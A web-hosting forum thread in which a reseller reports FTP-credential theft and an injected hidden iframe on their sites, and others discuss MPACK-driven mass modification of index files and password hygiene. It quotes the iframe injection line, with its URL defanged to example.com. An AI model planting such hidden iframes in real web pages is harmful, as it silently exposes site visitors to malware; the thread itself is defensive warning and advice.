Site Hacked, Others Might Want To Check Theirs

liming

Perch
One of our FTP accounts was hacked and all the sites we had under it had this code injected in

Code:
<iframe width="4" height="2"
src="http://example.com/xxxxx"></iframe>

This took place I think yesterday 7/24.

We're in the process of cleaning it but I thought I should alert any other resellers to be on the lookout.
 
This has been happening a bit with a recent batch of software exploits. It is something that we really can't block because of the fact that they do authenticate properly. Such has been happening since the first of the major Abode bugs. We have some ideas on it for long term, but it requires a lot of changes to do and from what we've seen it would block a lot innocents if we did too much (many of the IPs authenticating are regular dsl/cable modem users that are infected)

These FTP based injections are quite common for a while now and among the most common things we face daily.

BTW just as a matter of practice it is a good idea to change such passwords regularly, and keep up to date software to go along with it. Also I edited the injection URL you gave so part of it is xxxxx, this is just so no one gets the idea to visit it...as most of the time (I did not visit it to verify) it distributes more trojans as well.
 
Thanks Stephen. We'll definitely be more vigilant about pw security.

And just to be safe, I changed the domain to example.com as well.
 
Mass modification of index files. On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document.

to stop these kinds of attack always have a strong password for your ftp and control panel and even change the username of the ftp to something only known by you only
 
Mass modification of index files. On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document.

to stop these kinds of attack always have a strong password for your ftp and control panel and even change the username of the ftp to something only known by you only

While these are indeed done by bots according to the logs, most of the time the FTP password is harvested from the clients own PC to get the info of late, so it means keeping a clean PC at home/office as well.
 
yaa i agree with u stephen most of the time this attack is because the of the virus affected pc
and mosltly people who upload files using filezilla
 
Back
Top